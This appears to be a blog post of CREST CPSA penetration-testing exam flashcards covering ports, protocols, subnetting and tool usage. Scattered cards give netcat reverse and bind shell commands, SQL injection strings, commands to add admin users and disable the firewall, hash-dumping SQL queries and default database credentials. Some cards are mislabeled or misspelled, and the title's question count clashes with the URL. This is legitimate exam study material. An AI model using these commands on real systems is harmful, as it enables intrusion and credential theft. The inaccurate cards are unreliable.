{"id":110842,"date":"2023-07-28T13:13:49","date_gmt":"2023-07-28T13:13:49","guid":{"rendered":"https:\/\/learnexams.com\/blog\/?p=110842"},"modified":"2023-07-28T13:13:54","modified_gmt":"2023-07-28T13:13:54","slug":"crest-cpsa-exam-300-questions-and-correct-answers-latest-2023-2024verified-answers","status":"publish","type":"post","link":"https:\/\/www.learnexams.com\/blog\/2023\/07\/28\/crest-cpsa-exam-300-questions-and-correct-answers-latest-2023-2024verified-answers\/","title":{"rendered":"CREST CPSA EXAM 3000 QUESTIONS AND CORRECT ANSWERS LATEST 2023-2024(VERIFIED ANSWERS)"},"content":{"rendered":"\n<p>Crest cpsa exam practice test<br>crest cpsa exam cost<br>crest cpsa exam questions and answers<br>crest cpsa exam dump<br>Crest cpsa exam questions<br>crest cpsa pass mark<br>crest cpsa course<br>crest cpsa exam github<\/p>\n\n\n\n<p>TCP<br>Transmission Control Protocol<\/p>\n\n\n\n<p>UDP<br>User Datagram Protocol<\/p>\n\n\n\n<p>Port 21<br>FTP<\/p>\n\n\n\n<p>FTP<br>File Transfer Protocol<\/p>\n\n\n\n<p>Port 22<br>SSH<\/p>\n\n\n\n<p>SSH<br>Secure Shell<\/p>\n\n\n\n<p>Port 23<br>Telnet<\/p>\n\n\n\n<p>Port 25<br>SMTP<\/p>\n\n\n\n<p>SMTP<br>Simple Mail Transfer Protocol<\/p>\n\n\n\n<p>Port 49<br>TACACS<\/p>\n\n\n\n<p>TACACS<br>Terminal Access Controller Access Control System<\/p>\n\n\n\n<p>Port 53<br>DNS<\/p>\n\n\n\n<p>DNS<br>Domain Name System<\/p>\n\n\n\n<p>Port 67 (UDP)<br>DHCP (Server)<\/p>\n\n\n\n<p>Port 68 (UDP)<br>DHCP (Client)<\/p>\n\n\n\n<p>DHCP<br>Dynamic Host Configuration Protocol<\/p>\n\n\n\n<p>Port 69 (UDP)<br>TFTP<\/p>\n\n\n\n<p>TFTP<br>Trivial File Transfer Protocol<\/p>\n\n\n\n<p>Port 80<br>HTTP<\/p>\n\n\n\n<p>HTTP<br>Hypertext Transfer Protocol<\/p>\n\n\n\n<p>Port 88<br>Kerberos<\/p>\n\n\n\n<p>Kerberos<br>A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner<\/p>\n\n\n\n<p>Port 110<br>POP3<\/p>\n\n\n\n<p>POP3<br>Post Office Protocol version 3<\/p>\n\n\n\n<p>Port 111<br>RPC<\/p>\n\n\n\n<p>RPC<br>Remote Procedure Call<\/p>\n\n\n\n<p>Port 123<br>NTP<\/p>\n\n\n\n<p>NTP<br>Network Time Protocol<\/p>\n\n\n\n<p>Port 135<br>Windows RPC (EPM)<\/p>\n\n\n\n<p>Port 593<br>RPC over HTTPS<\/p>\n\n\n\n<p>Port 445<br>SMB<\/p>\n\n\n\n<p>SMB<br>Server Message Block<\/p>\n\n\n\n<p>Port 137 (UDP)<br>NetBIOS (name services)<\/p>\n\n\n\n<p>Port 138 (UDP)<br>NetBIOS (datagram services)<\/p>\n\n\n\n<p>Port 139<br>NetBIOS (session services)<\/p>\n\n\n\n<p>NetBIOS<br>Network Basic Input\/Output System<\/p>\n\n\n\n<p>Port 143<br>IMAP<\/p>\n\n\n\n<p>IMAP<br>Internet Message Access Protocol<\/p>\n\n\n\n<p>Port 161 (UDP)<br>SNMP<\/p>\n\n\n\n<p>SNMP<br>Simple Network Management Protocol<\/p>\n\n\n\n<p>Port 179<br>BGP<\/p>\n\n\n\n<p>BGP<br>Border Gateway Protocol<\/p>\n\n\n\n<p>Border Gateway Protocol (BGP)<br>A standardized exterior gateway protocol designed to exchange routing and reach-ability information among autonomous systems on the Internet. The protocol is classified as a path vector protocol.<\/p>\n\n\n\n<p>Port 201<br>AppleTalk<\/p>\n\n\n\n<p>Port 389<br>LDAP<\/p>\n\n\n\n<p>LDAP<br>Lightweight Directory Access Protocol<\/p>\n\n\n\n<p>Port 443<br>HTTPS<\/p>\n\n\n\n<p>Port 500 (UDP)<br>Internet Key Exchange (IKE) (used with IPSec)<\/p>\n\n\n\n<p>ISAKMP<\/p>\n\n\n\n<p>ISAKMP<br>Internet Security Association and Key Management Protocol<\/p>\n\n\n\n<p>Port 514 (UDP)<br>Syslog<\/p>\n\n\n\n<p>Port 520<br>RIP<\/p>\n\n\n\n<p>RIP<br>Routing Information Protocol<\/p>\n\n\n\n<p>Port 546<br>DHCPv6 (client)<\/p>\n\n\n\n<p>Port 567<br>DHCPv6 (servers)<\/p>\n\n\n\n<p>Port 587<br>SMTP<\/p>\n\n\n\n<p>Port 902<br>VMWare<\/p>\n\n\n\n<p>Port 1080<br>Socks Proxy<\/p>\n\n\n\n<p>Port 636<br>LDAPS<\/p>\n\n\n\n<p>Port 1194<br>VPN<\/p>\n\n\n\n<p>Port 1433<br>MS-SQL<\/p>\n\n\n\n<p>Port 1434<br>MS-SQL (monitoring)<\/p>\n\n\n\n<p>Port 1521<br>Oracle<\/p>\n\n\n\n<p>Port 1629<br>DameWare<\/p>\n\n\n\n<p>Port 2049<br>NFS<\/p>\n\n\n\n<p>NFS<br>Network File System<\/p>\n\n\n\n<p>Port 3128<br>Squid Proxy<\/p>\n\n\n\n<p>Port 3306<br>MySQL<\/p>\n\n\n\n<p>Port 3389<br>RDP (Remote Desktop Protocol)<\/p>\n\n\n\n<p>Port 5060<br>SIP<\/p>\n\n\n\n<p>SIP<br>Session Initiation Protocol<\/p>\n\n\n\n<p>Port 5222<br>Jabber<\/p>\n\n\n\n<p>Port 5432<br>Postgres<\/p>\n\n\n\n<p>Port 5666<br>Nagios<\/p>\n\n\n\n<p>Postgres<br>An object-relational database management system with an emphasis on extensibility and standards compliance<\/p>\n\n\n\n<p>Nagios<br>Open source system monitoring service<\/p>\n\n\n\n<p>Port 5900<br>VNC<\/p>\n\n\n\n<p>VNC<br>Virtual Network Computing<\/p>\n\n\n\n<p>Port 6000<br>X11<\/p>\n\n\n\n<p>X11<br>A windowing system for bitmap displays, common on Unix-like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.<\/p>\n\n\n\n<p>Port 6129<br>DameWare<\/p>\n\n\n\n<p>DameWare<br>Remote Access Software on port 6129<\/p>\n\n\n\n<p>Port 6667<br>IRC (Internet Relay Chat)<\/p>\n\n\n\n<p>Port 9001<br>Tor<\/p>\n\n\n\n<p>Port 9001<br>HSQL<\/p>\n\n\n\n<p>Port 9090<br>Openfire<\/p>\n\n\n\n<p>Port 9100<br>Jet Direct<\/p>\n\n\n\n<p>Yersinia<br>Layer 2 testing tool (STP, CDP, VLAN Trunking, etc)<\/p>\n\n\n\n<p>STP<br>Spanning Tree Protocol<\/p>\n\n\n\n<p>CDP<br>Cisco Discovery Protocol<\/p>\n\n\n\n<p>DTP<br>Dynamic Trunking Protocol<\/p>\n\n\n\n<p>HSRP<br>Hot Standby Router Protocol<\/p>\n\n\n\n<p>VTP<br>VLAN Trunking Protocol<\/p>\n\n\n\n<p>fgdump<br>A utility for dumping passwords on Windows NT\/2000\/XP\/2003 machines<\/p>\n\n\n\n<p>Reserved Internal IPs<br>10.0.0.0\/8 (10.0.0.0-10.255.255.255) : Private<\/p>\n\n\n\n<p>127.0.0.0\/8 (127.0.0.0-127.255.255.255) : Local Host Loopback<\/p>\n\n\n\n<p>172.16.0.0\/12 (172.16.0.0-172.31.255.255) : Private<\/p>\n\n\n\n<p>192.168.0.0\/16 (192.168.0.0-192.168.255.255) : Private<\/p>\n\n\n\n<p>Symmetric Encryption<br>DES\/3DES<br>AES<br>Twofish<br>Blowfish<br>Serpent<br>IDEA<br>RC4, RC5, RC6<br>CAST<\/p>\n\n\n\n<p>Asymmetric Encryption<br>RSA<br>El Gamal<br>ECC Eliptic Curve<br>Diffie-Helman (Key Exchange)<br>Paillier<br>Merkle-Helman<br>Cramer-Shoup<\/p>\n\n\n\n<p>Hashes<br>MD5<br>SHA1<br>MySQL &lt; 4.1<br>MySQL5<br>MD5 (WP)<br>MD5 (phpBB3)<br>LM \/ NTLM<\/p>\n\n\n\n<p>Oracle Default Credentials<br>&#8211;Username | Password&#8211;<br>SYSTEM | MANAGER<br>ANONYMOUS | ANONYMOUS<br>SCOTT | TIGER<br>OLAPSYS | MANAGER<br>SYS | CHANGE_ON_INSTALL<\/p>\n\n\n\n<p>Port 512<br>rexec (username \/ password)<\/p>\n\n\n\n<p>Port 513<br>rlogin (telnet)<\/p>\n\n\n\n<p>Port 514<br>rsh<\/p>\n\n\n\n<p>Port 514<br>rcp<\/p>\n\n\n\n<p>LM Hash<br>Primary Windows LAN hash before Windows NT. 14 character limit.<\/p>\n\n\n\n<p>DES<br>56 bit key encryption (16 cycles of 48 bit subkeys)<\/p>\n\n\n\n<p>3DES<br>168 bit key encryption (48 cycles)<\/p>\n\n\n\n<p>TTL for Windows<br>128<\/p>\n\n\n\n<p>TTL for Linux<br>64<\/p>\n\n\n\n<p>TTL for Networking Devices \/ Solaris<br>255<\/p>\n\n\n\n<p>Cisco Password Encryption<br>secret 4 : Crappy SHA256<br>secret 5 : Salted MD5<br>secret 7: Crappy Cisco encryption to prevent cleartext in the config<br>secret 8 : PBKDF2 (Password-Based Key Derivation Function 2) bruteforce target<br>secret 9 : scrypt (BINGO)<\/p>\n\n\n\n<p>SIP Requests<br>INVITE<br>ACK<br>BYE<br>CANCEL<br>OPTIONS<br>REGISTER<br>PRACK<br>SUBSCRIBE<br>NOTIFY<br>PUBLISH<br>INFO<br>REFER<br>MESSAGE<br>UPDATE<\/p>\n\n\n\n<p>SMTP Requests<br>MAIL<br>RCPT<br>DATA<\/p>\n\n\n\n<p>SNMP Requests<br>Get<br>GetNext<br>Set<br>GetBulk<br>Response<br>Trap<br>Inform<\/p>\n\n\n\n<p>HTTP Status Codes<br>1xx &#8211; Info<br>2xx &#8211; Success<br>3xx &#8211; Redirection<br>4xx &#8211; Error<br>5xx &#8211; Server Error<\/p>\n\n\n\n<p>HTTP Status Code 404<br>NOT FOUND the method is not available<\/p>\n\n\n\n<p>HTTP Status Code 301<br>Moved Permanently<\/p>\n\n\n\n<p>HTTP Status Code 302<br>Temporarily Moved<\/p>\n\n\n\n<p>HTTP Status Code 410<br>Gone<\/p>\n\n\n\n<p>SQL Injections (Escape Characters)<br>&#8216; OR &#8216;1&#8217; = &#8216;1&#8217; &#8212;<br>&#8216; OR &#8216;1&#8217; = &#8216;1&#8217; {<br>&#8216; OR &#8216;1&#8217; = &#8216;1&#8217; \/*<\/p>\n\n\n\n<p>SQL Injections (Type Handling)<br>1;DROPTABLE users<\/p>\n\n\n\n<p>Linux File Permissions<br>drwxrwxrwx 2 user(owner) group size date filename<\/p>\n\n\n\n<p>d | rwx | rwx | rwx<br>Filetype | User | Group | Everyone<\/p>\n\n\n\n<p>Linux Command : Change Password<br>passwd<\/p>\n\n\n\n<p>Linux Command : Find Files of Type<br>find . -type f -iname &#8216;<em>.pdf&#8217; locate &#8216;<\/em>.pdf&#8217;<\/p>\n\n\n\n<p>Linux File System Structure<br>\/bin &#8211; User Binaries<br>\/boot &#8211; Bootup related files<br>\/dev &#8211; Interface for system devices<br>\/etc &#8211; System Config Files<br>\/home &#8211; Base directory for user files<br>\/lib &#8211; Critical software libraries<br>\/opt &#8211; Third party software<br>\/proc &#8211; System and running processes<br>\/root &#8211; Home for root<br>\/sbin &#8211; Sys Admin binaries<br>\/tmp &#8211; Temporary Files<br>\/usr &#8211; Less critical files<br>\/var &#8211; Variable system files<\/p>\n\n\n\n<p>IPTables<br>A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores<\/p>\n\n\n\n<p>Wireshark and TCPdump<br>Common packet analyzers. Allows the user to display TCP\/IP and other packets being transmitted or received over a network to which the computer is attached<\/p>\n\n\n\n<p>pfSense<br>Open source firewall\/router computer software distribution based on FreeBSD<\/p>\n\n\n\n<p>Solaris Command : Process Listing<br>prstat -a<\/p>\n\n\n\n<p>Solaris Command : Services and Status<br>svcs -a<\/p>\n\n\n\n<p>Solaris Command: Start Service (Admin)<br>svcadm start<\/p>\n\n\n\n<p>NT 3.1 Versions<br>Windows NT 3.1 (All)<\/p>\n\n\n\n<p>NT 3.5 Versions<br>Windows NT 3.5 (All)<\/p>\n\n\n\n<p>NT 3.51 Versions<br>Windows NT 3.51 (All)<\/p>\n\n\n\n<p>NT 4.0 Versions<br>Windows NT 4.0 (All)<\/p>\n\n\n\n<p>NT 5.0 Versions<br>Windows 2000 (All)<\/p>\n\n\n\n<p>NT 5.1 Versions<br>Windows XP (Home, pro, MC, Tablet, PC, Starter, Embedded)<\/p>\n\n\n\n<p>NT 5.2 Versions<br>Windows XP (64 bit, Pro 64 bit)<br>Windows Server 2003 and R2<br>Windows Home Server<\/p>\n\n\n\n<p>NT 6.0 Versions<br>Windows Vista (All)<br>Windows Server 2008 (Foundation, Standard, Enterprise)<\/p>\n\n\n\n<p>NT 6.1 Versions<br>Windows 7 (All)<br>Windows Server 2008 R2 (All)<\/p>\n\n\n\n<p>NT 6.2 Versions<br>Windows 8<br>Windows Phone 8<br>Windows Server 2012<\/p>\n\n\n\n<p>%SYSTEMDRIVE%\\boot.ini<br>Contains the boot options for computers with BIOS firmware running NT-based operating system prior to Windows Vista<\/p>\n\n\n\n<p>%SYSTEMROOT%\\repair\\SAM<\/p>\n\n\n\n<p>%SYSTEMROOT%\\System32\\config\\RegBack\\SAM<br>Stores Windows users&#8217; passwords in a hashed format (in LM hash and NTLM hash). These are backups of C:\\windows\\system32\\config\\SAM<\/p>\n\n\n\n<p>Windows Commands : System Info<br>ver : OS Version<br>sc query state=all : Services<br>tasklist \/svc : Processes and Services<br>echo %USERNAME% : Current user<\/p>\n\n\n\n<p>Windows Command : Find Files of Type<br>dir \/a \/s \/n c:.pdf<\/p>\n\n\n\n<p>Windows Commands : Add User, Make Admin<br>net user \/add<br>net localgroup &#8220;Administrators&#8221; \/add<\/p>\n\n\n\n<p>Linux Command : Add User, Make Sudoer<br>useradd (adduser )<br>passwd<br>sudo useradd sudo (sudo adduser sudo)<\/p>\n\n\n\n<p>Command : View Network Info<br>Linux: ifconfig<br>Windows: ipconfig \/all<\/p>\n\n\n\n<p>Command : Display File Contents<br>Linux: cat<br>Windows: cat<\/p>\n\n\n\n<p>nslookup<br>A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.<\/p>\n\n\n\n<p>IIS 1 Defaults<br>Windows NT Addon<\/p>\n\n\n\n<p>IIS 2 Defaults<br>NT 4.0<\/p>\n\n\n\n<p>IIS 3 Defaults<br>NT 4 Service Pack<\/p>\n\n\n\n<p>IIS 4 Defaults<br>NT4 Option Pack<\/p>\n\n\n\n<p>IIS 5 Defaults<br>Windows 2000<\/p>\n\n\n\n<p>IIS 5.1 Defaults<br>Windows XP<\/p>\n\n\n\n<p>IIS 6 Defaults<br>Windows Server 2003, Windows XP Pro<\/p>\n\n\n\n<p>IIS 7 Defaults<br>Windows Vista, Server 2008<\/p>\n\n\n\n<p>IIS 7.5 Defaults<br>Windows 7, 2008 R2<\/p>\n\n\n\n<p>IIS 8 Defaults<br>Windows Server 2012, Windows 8<\/p>\n\n\n\n<p>IIS 8.5 Defaults<br>Windows Server 2012 R2, Windows 8.1<\/p>\n\n\n\n<p>IIS 10 v 1607 Defaults<br>Windows Server 2016, Windows 10 Anniversary Update<\/p>\n\n\n\n<p>IIS 10 v 1709 Defaults<br>Windows 10 Fall Creators, v1709<\/p>\n\n\n\n<p>IIS 10 v 1809 Defaults<br>Windows Server 2019, Windows 10 October Update<\/p>\n\n\n\n<p>Windows Command : Disable Firewall<br>netsh advfirewall set currentprofile state off<br>netsh advfirewall set allprofiles state off<\/p>\n\n\n\n<p>Sysinternals Suite<br>A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions<\/p>\n\n\n\n<p>WMCI<br>Windows Management Instrumentation Command-Line<\/p>\n\n\n\n<p>WMCI Command : Execute Process<br>wmci process call create &#8220;process_name&#8221;<\/p>\n\n\n\n<p>WMCI Command : Uninstall Software<br>wmci product get name \/value<br>wmci product where name=&#8221;XX&#8221; call uninstall \/nointeractive<\/p>\n\n\n\n<p>PCI Card Info Storage Common-Use<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Store card details (i.e CC number, expiry) in encrypted form<\/li>\n\n\n\n<li>Store cardholder details (name, address, contact details\u2026ie PII) in a SEPARATE encrypted database with a unique reference identifier linking the two<br>-DO NOT STORE sensitive data (ie CVV2, CVV or CID values)<\/li>\n<\/ul>\n\n\n\n<p>Windows : Active Directory Default Location<br>C:\\Windows\\NTDS<\/p>\n\n\n\n<p>Ntds.dit is the physical storage file<\/p>\n\n\n\n<p>Windows : Domain Common Folders<br>C:\\Windows\\SYSVOL<\/p>\n\n\n\n<p>Contains Group Policies, Login Scripts, Staging Folders, etc.<\/p>\n\n\n\n<p>dsquery<br>Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain<\/p>\n\n\n\n<p>Classful IP Range : Class A<br>128 Networks (2^7), 16,777,216 Addresses per network (2^24)<\/p>\n\n\n\n<p>Range : 0.0.0.0-127.0.0.0<br>Default Subnet Mask : 255.0.0.0<br>CIDR Notation : \/8<\/p>\n\n\n\n<p>Classful IP Range : Class B<br>16,384 Networks (2^14), 65,536 Addresses per network (2^16)<\/p>\n\n\n\n<p>Range : 128.0.0.0-191.255.0.0<br>Default Subnet Mask : 255.255.0.0<br>CIDR Notation : \/16<\/p>\n\n\n\n<p>Classful IP Range : Class C<br>2,097,152 Networks (2^21), 256 Addresses per network (2^8)<\/p>\n\n\n\n<p>Range : 192.0.0.0-223.255.255.0<br>Default Subnet Mask : 255.255.255.0<br>CIDR Notation : \/24<\/p>\n\n\n\n<p>Classful IP Range Calculation<br>If the first bit is a &#8220;0&#8221;, it&#8217;s a class A address (Half the address space has a &#8220;0&#8221; for the first bit, so this is why class A takes up half the address space.)<\/p>\n\n\n\n<p>If the second bit is a &#8220;0&#8221;, it&#8217;s a class B address (Half of the remaining non-class-A addresses, or one quarter of the total.)<\/p>\n\n\n\n<p>If the third bit is a &#8220;0&#8221;, it&#8217;s a class C address (Half again of what&#8217;s left, or one eighth of the total.)<\/p>\n\n\n\n<p>If the fourth bit is a &#8220;0&#8221;, it&#8217;s a class D address. (Half the remainder, or one sixteenth of the address space.) If it&#8217;s a &#8220;1&#8221;, it&#8217;s a class E address. (The other half, one sixteenth.)<\/p>\n\n\n\n<p>Classless Subnets \/ CIDR<br>Class C &#8211; 255.255.255.0 , \/24 (254 Hosts)<br>Class B &#8211; 255.255.0.0 , \/16 (65,534 Hosts)<br>Class A &#8211; 255.0.0.0 , \/8 (16,777,214 Hosts)<\/p>\n\n\n\n<p>CRITICAL SUBNET INFO<br>RTFM page 36<\/p>\n\n\n\n<p>Hexadecimal Chart<br>0<br>1<br>2<br>3<br>4<br>5<br>6<br>7<br>8<br>9<br>10 &#8211; A<br>11 &#8211; B<br>12 &#8211; C<br>13 &#8211; D<br>14 &#8211; E<br>15 &#8211; F<\/p>\n\n\n\n<p>VLAN<br>A switched network that is logically segmented by function, project team, or application, without regard to the physical locations of the users.<\/p>\n\n\n\n<p>VLAN IDs 1002-1005<br>Token Ring and FDDI VLANs<\/p>\n\n\n\n<p>VLAN IDs greater than 1005<br>Extended-range VLANs (not stored in the VLAN database)<\/p>\n\n\n\n<p>VLAN IDs 1-1005<br>Normal-range VLANs<\/p>\n\n\n\n<p>vlan.dat<br>Configurations for VLAN IDs 1-1005<\/p>\n\n\n\n<p>Netcat : Start Listener to Catch Shell<br>Linux:<br>nc 10.0.0.1 1234 -e \/bin\/sh<br>Windows:<br>nc 10.0.0.1 1234 -e cmd.exe<\/p>\n\n\n\n<p>(-e is execute and is not always supported)<\/p>\n\n\n\n<p>Netcat : Listen<br>nc -nlvp<\/p>\n\n\n\n<p>Netcat : Transfer Text or Binary Files<br>Listener : nc -nlvp 4444 &gt; incoming.exe<\/p>\n\n\n\n<p>Sender: nc -nv IP to send to 4444 &lt; file<\/p>\n\n\n\n<p>Netcat : Bind Shell<br>Listener:<br>nc -nlvp 4444 -e cmd.exe (to set up cmd to run)<\/p>\n\n\n\n<p>Sender\/ &#8220;Talker&#8221;:<br>nc -nv IP to connect to 4444<\/p>\n\n\n\n<p>(this will execute the cmd.exe and all the &#8220;Talker&#8221; to connect to the host)<br>Attacking Listener<\/p>\n\n\n\n<p>Netcat : Reverse Shell<br>Listener:<br>nc -nlvp 4444<\/p>\n\n\n\n<p>Sender:<br>nc -nv IP to send to 4444 \/bin\/bash<\/p>\n\n\n\n<p>(sends shell!)<br>Attacking Sender<\/p>\n\n\n\n<p>NMap : Scan Types<br>-sP : ping scan<br>-sS : syn scan (&#8220;half open&#8221; scan)<br>-sT : connect scan (full TCP)<br>-sU : UDP scan<br>-sO : protocol scan<\/p>\n\n\n\n<p>Port Count<br>65,536 (2^16) Ports<\/p>\n\n\n\n<p>This applies to TCP AND UDP<\/p>\n\n\n\n<p>NMap : Scan EVERY Port<br>TCP: nmap -p-<br>UDP: nmap -sU -p-<\/p>\n\n\n\n<p>NMap : Common Options<br>-p1-65535 : Ports<br>-T[0-5] : &#8220;Scan Speed&#8221;, can help hide you<br>-n : No DNS Resolution<br>-O : OS Detection<br>-A : AGGRESSIVE<br>-sV : Version Detection<br>-PN : No Ping<br>-6 : IPv6 Scan<br>-oA : Output ALL types<\/p>\n\n\n\n<p>NMap : DNS Reverse Lookup<br>nmap -R -sL -dns-server<\/p>\n\n\n\n<p>Hash Lengths<br>MD5 : 16 Bytes<br>SHA-1 : 20 bytes<br>SHA-256 : 32 Bytes<br>SHA-512 : 64 Bytes<\/p>\n\n\n\n<p>IIS<br>Microsoft Web Server<\/p>\n\n\n\n<p>Apache \/ Tomcat<br>Apache Web Servers<\/p>\n\n\n\n<p>GWS<br>Google Web Server<\/p>\n\n\n\n<p>Websphere<br>IBM Web Server<\/p>\n\n\n\n<p>Litespeed<br>LiteSpeed Tech Web Server<\/p>\n\n\n\n<p>MS-SQL : DB Version<br>SELECT @@version<\/p>\n\n\n\n<p>EXEC xp_msver<br>(detailed version info)<\/p>\n\n\n\n<p>MS-SQL : Run OS Command<br>EXEC master..xp_cmdshell &#8216;net user&#8217;<\/p>\n\n\n\n<p>MS-SQL : SELECT commands<br>SELECT HOST_NAME( ) : Hostname and IP<\/p>\n\n\n\n<p>SELECT DB_NAME ( ) : Current DB<\/p>\n\n\n\n<p>SELECT name FROM master..sysdatabases; : List DBs<\/p>\n\n\n\n<p>SELECT user_name ( ) : Current user<\/p>\n\n\n\n<p>SELECT name FROM master..syslogins : List users<\/p>\n\n\n\n<p>SELECT name FROM master..sysobjects WHERE xtype=&#8217;U&#8217;; : List Tables<\/p>\n\n\n\n<p>SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjections WHERE name=&#8217;mytable&#8217;); : List columns<\/p>\n\n\n\n<p>MS-SQL : List all Tables and Columns<br>SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = &#8216;mytable&#8217;)<\/p>\n\n\n\n<p>MS-SQL : System Table (Info on All Tables)<br>SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES<\/p>\n\n\n\n<p>MS-SQL 2005 Vulnerability (Password Hashes)<br>SELECT name, password_hash FROM master.sys.sql_logins<\/p>\n\n\n\n<p>Postgres : SELECT commands<br>SELECT version(); : DB Version<\/p>\n\n\n\n<p>SELECT inet_server)addr(); : Hostname and IP<\/p>\n\n\n\n<p>SELECT current_database(); : Current DB<\/p>\n\n\n\n<p>SELECT datname FROM pg_database; : List DBs<\/p>\n\n\n\n<p>SELECT user; : Current user<\/p>\n\n\n\n<p>SELECT username FROM pg_user; : List Users<\/p>\n\n\n\n<p>SELECT username,passwd FROM pg_shadow : List password hashes<\/p>\n\n\n\n<p>MySQL Default Credentials<br>root | MYSQL<\/p>\n\n\n\n<p>MySQL : SELECT Commands<br>SELECT @@version; : DB Version<\/p>\n\n\n\n<p>SELECT @@hostname; : Hostname and IP<\/p>\n\n\n\n<p>SELECT database(); : Current DB<\/p>\n\n\n\n<p>SELECT distinct (db) FROM mysql.db; : List DBs<\/p>\n\n\n\n<p>SELECT user(); : Current user<\/p>\n\n\n\n<p>SELECT user FROM mysql.user; : List Users<\/p>\n\n\n\n<p>SELECT host,user,password FROM mysql.user; : List password hashes<\/p>\n\n\n\n<p>MySQL : List Tables (and Columns)<br>SHOW TABLES (only works for current database)<\/p>\n\n\n\n<p>SELECT * FROM information_schema.columns (full dump)<\/p>\n\n\n\n<p>Oracle : SELECT Commands<br>SELECT * FROM v$version; : DB Version<br>(SELECT version FROM v$instance;)<\/p>\n\n\n\n<p>SELECT instance_name FROM v$instance : Current DB<br>(SELECT name FROM v$database;)<\/p>\n\n\n\n<p>SELECT DISTINCT owner FROM all_tables; : List DBs<\/p>\n\n\n\n<p>SELECT user FROM dual; : Current User<\/p>\n\n\n\n<p>SELECT username FROM all_users ORDER BY username; : List users<\/p>\n\n\n\n<p>SELECT column_name FROM all_tab_columns; : List Columns<\/p>\n\n\n\n<p>SELECT table_name FROM all_tables; : List Tables<\/p>\n\n\n\n<p>SELECT name, password, astatus FROM sys.user$; : List password hashes<\/p>\n\n\n\n<p>host.equiv (or .rhosts file) Structure<br>Allow any user to log in from any host:<\/p>\n\n\n\n<p>+<\/p>\n\n\n\n<p>Allow any user from host with a matching local account to log in:<\/p>\n\n\n\n<p>host<\/p>\n\n\n\n<p>Allow any user from host to log in:<\/p>\n\n\n\n<p>host +<\/p>\n\n\n\n<p>Allow user from host to log in as any non-root user:<\/p>\n\n\n\n<p>host user<\/p>\n\n\n\n<p>Allow all users with matching local accounts from host to log in except for baduser:<\/p>\n\n\n\n<p>host -baduser<br>host<\/p>\n\n\n\n<p>Deny all users from host:<\/p>\n\n\n\n<p>-host<\/p>\n\n\n\n<p>Allow all users with matching local accounts on all hosts in a netgroup:<\/p>\n\n\n\n<p>+@netgroup<\/p>\n\n\n\n<p>Disallow all users on all hosts in a netgroup:<\/p>\n\n\n\n<p>-@netgroup<\/p>\n\n\n\n<p>Allow all users in a netgroup to log in from host as any non-root user:<\/p>\n\n\n\n<p>host +@netgroup<\/p>\n\n\n\n<p>Allow all users with matching local accounts on all hosts in a netgroup except baduser:<\/p>\n\n\n\n<p>+@netgroup -baduser<br>+@netgroup<\/p>\n\n\n\n<p>Linux Shell Breakouts<br>python -c &#8216;import pty;pty.spawn(&#8220;\/bin\/bash&#8221;)&#8217;<\/p>\n\n\n\n<p>echo os.system(&#8216;\/bin\/bash&#8217;)<\/p>\n\n\n\n<p>\/bin\/sh -i<\/p>\n\n\n\n<p>Language Vulns : Java (OO)<br>Log Injection<br>Deadlock<br>Language-based Attacks<\/p>\n\n\n\n<p>Language Vulns : C (Function)<br>Code Injection<br>Buffer Overflow<\/p>\n\n\n\n<p>Language Vulns : Objective-C (OO)<br>Code Insertion<br>Malformation<br>Race Conditions<\/p>\n\n\n\n<p>Language Vulns : C++ (OO)<br>Race Conditions<\/p>\n\n\n\n<p>Language Vulns: PHP<br>Incorrect Element Removal<\/p>\n\n\n\n<p>NIC<br>Network Interface Card<\/p>\n\n\n\n<p>Network Interface Card (NIC)<br>An expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection.<\/p>\n\n\n\n<p>MAC<br>Media Access Control<\/p>\n\n\n\n<p>NAT<br>Network Address Translation<\/p>\n\n\n\n<p>Media Access Control (MAC)<br>An address for communications on the physical network segment.<\/p>\n\n\n\n<p>Network Address Translation (NAT)<br>A technique that allows private IP addresses to be used on the public Internet.<\/p>\n\n\n\n<p>OSI Model<br>&#8220;Please Dont Nag Tyrannosaurus, She&#8217;ll Probably Attack&#8221;<\/p>\n\n\n\n<p>1 : Physical (Bits)<br>2 : Data Link (Frames)<br>3 : Network (Packets)<br>4 : Transport (Segments)<br>5 : Session (Data)<br>6 : Presentation (Data)<br>7 : Application (Data)<\/p>\n\n\n\n<p>TCP\/IP Model<br>&#8220;Never Ingest Turian Almonds&#8221;<\/p>\n\n\n\n<p>1 : Network Interface<br>2 : Internet Layer<br>3 : Transport Layer<br>4 : Application Layer<\/p>\n\n\n\n<p>IETF<br>Internet Engineering Task Force<\/p>\n\n\n\n<p>IANA<br>Internet Assigned Numbers Authority<\/p>\n\n\n\n<p>Wireless Standards<br>802.11b &#8211; 2.4 GHz 11 Mbps<br>802.11a &#8211; 5 GHz, 54 Mbps<br>802.11g &#8211; 2.4 GHz, 54 Mbps<br>802.11n &#8211; 5 GHz, 108 Mpbs<br>802.15 &#8211; Bluetooth 2.4 GHz<\/p>\n\n\n\n<p>Data Link Protocols<br>1) SLIP (serial line internet protocol)<br>2) PPP (point-to-point protocol)<br>3) ARP (address resolution protocol) (resolves IP&#8217;s into MAC&#8217;s)<br>4) RARP (reverse address resolution protocol) (MAC&#8217;s into IP&#8217;s)<br>5) L2F (layer 2 forwarding)<br>6) L2TP (layer 2 tunneling protocol)<br>7) PPTP (point-to-point tunneling protocol)<br>8) ISDN (integrated services digital network)<\/p>\n\n\n\n<p>ARP<br>Address Resolution Protocol<\/p>\n\n\n\n<p>IGMP<br>Internet Group Management Protocol<\/p>\n\n\n\n<p>FQDN<br>Fully Qualified Domain Name<\/p>\n\n\n\n<p>IOC<br>Indications of Compromise<\/p>\n\n\n\n<p>POC<br>Point of Contact<\/p>\n\n\n\n<p>Proof of Concept<\/p>\n\n\n\n<p>SIEM<br>Security Information and Event Management<\/p>\n\n\n\n<p>MBSA<br>Microsoft Baseline Security Analyzer<\/p>\n\n\n\n<p>CAT5<br>type of cable that has the ability to transfer information from one computer to 